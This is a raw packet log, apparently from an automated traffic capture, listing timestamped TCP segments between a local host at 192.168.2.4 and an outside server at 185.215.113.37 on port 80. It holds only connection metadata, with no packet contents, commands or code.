Oct 10, 2024 18:23:18.999917030 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.999929905 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.999950886 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.000562906 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.000595093 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.000605106 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.000614882 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.000633955 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.000649929 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.000721931 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.000731945 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.000750065 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.000754118 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.000762939 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.000771999 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.000787020 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.000803947 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.000926018 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.000936985 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.000955105 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.000969887 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.000972033 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.000979900 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.000998974 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.000999928 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.001017094 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.001032114 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.001049995 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.001076937 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.001255035 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.001265049 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.001281023 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.001288891 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.001291990 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.001307011 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.001316071 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.001323938 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.001333952 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.001343966 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.001352072 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.001360893 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.001375914 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.001377106 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.001389027 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.001393080 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.001404047 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.001419067 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.001420975 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.001441956 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.001465082 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.001708984 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.001718998 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.001738071 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.001739979 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.001750946 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.001768112 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.001768112 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.001773119 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.001789093 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.001802921 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.001919031 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.001929045 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.001945972 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.001948118 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.001955986 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.001964092 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.001974106 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.001979113 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.001986980 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.001996040 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.002007961 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.002016068 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.002042055 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.002130032 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.002140045 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.002157927 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.002166033 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.002167940 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.002186060 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.002188921 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.002214909 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.002278090 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.002288103 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.002309084 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.002331972 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.002352953 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.002362967 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.002378941 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.002382040 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.002392054 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.002398968 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.002403975 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.002413988 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.002439022 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.002460957 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.002489090 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.002504110 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.002516985 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.002526999 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.002533913 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.002547026 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.002563000 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.002650023 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.002660990 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.002676964 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.002682924 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.002686024 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.002702951 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.002707005 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.002731085 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.002891064 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.002901077 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.002918959 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.002928019 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.002931118 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.002947092 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.002952099 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.002957106 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.002973080 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.002978086 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.002986908 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.003001928 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.003005981 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.003015995 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.003031969 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.003057003 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.003186941 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.003196955 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.003213882 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.003217936 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.003222942 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.003242016 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.003245115 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.003274918 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.046021938 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.046066999 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.046081066 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.046086073 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.046107054 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.046124935 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.046147108 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.046156883 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.046175003 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.046178102 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.046188116 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.046195984 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.046217918 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.046358109 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.046367884 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.046385050 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.046394110 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.046396971 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.046412945 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.046420097 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.046422958 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.046441078 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.046447992 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.046469927 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.047039032 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.047080994 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.047082901 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.047096014 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.047118902 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.047137022 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.047187090 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.047198057 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.047215939 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.047219992 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.047230959 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.047238111 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.047255993 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.047271013 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.050065994 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.050095081 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.050101042 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.050106049 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.050127029 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.050143003 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.050234079 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.050244093 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.050261021 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.050272942 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.050275087 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.050308943 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.050466061 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.050476074 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.050493002 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.050502062 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.050508022 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.050520897 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.050533056 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.050546885 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.050546885 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.050565958 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.050580978 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.091095924 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.091125011 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.091139078 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.091145992 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.091171980 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.091420889 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.091432095 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.091449022 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.091461897 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.091463089 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.091479063 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.091490984 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.091490984 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.091505051 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.091516972 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.091526985 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.091532946 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.091550112 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.091567039 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.091592073 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.091603041 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.091619015 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.091625929 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.091650009 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.091841936 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.091887951 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.091887951 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.091898918 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.091933012 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.092009068 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.092019081 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.092036009 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.092041016 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.092048883 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.092066050 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.092101097 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.092184067 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.092192888 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.092211008 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.092217922 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.092223883 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.092238903 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.092240095 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.092253923 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.092269897 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.092271090 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.092281103 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.092292070 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.092322111 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.092354059 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.092386007 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.092530966 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.092562914 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.092602968 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.092618942 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.092649937 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.092684031 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.092694044 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.092710018 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.092716932 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.092742920 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.092755079 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.092781067 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.092858076 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.092869997 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.092885971 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.092890978 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.092895985 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.092907906 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.092910051 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.092924118 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.092925072 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.092941046 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.092981100 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.092995882 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.093008995 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.093022108 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.093039036 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.093070030 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.093079090 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.093096018 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.093102932 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.093112946 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.093127012 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.093152046 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.093310118 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.093322992 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.093343973 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.093357086 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.093357086 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.093369961 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.093381882 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.093389988 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.093399048 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.093410969 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.093411922 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.093426943 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.093436956 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.093445063 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.093453884 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.093477964 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.093496084 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.093497038 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.093540907 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.093556881 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.093566895 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.093584061 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.093590975 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.093594074 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.093611956 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.093642950 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.093714952 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.093724966 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.093741894 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.093749046 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.093755007 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.093780041 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.093811035 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.093852997 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.093863010 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.093878984 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.093897104 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.093899012 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.093926907 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.094084978 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.094099998 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.094111919 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.094125986 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.094132900 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.094145060 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.094158888 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.094161987 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.094192982 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.094424009 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.094434023 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.094460011 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.094494104 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.137566090 CEST	80	49731	185.215.113.37	192.168.2.4
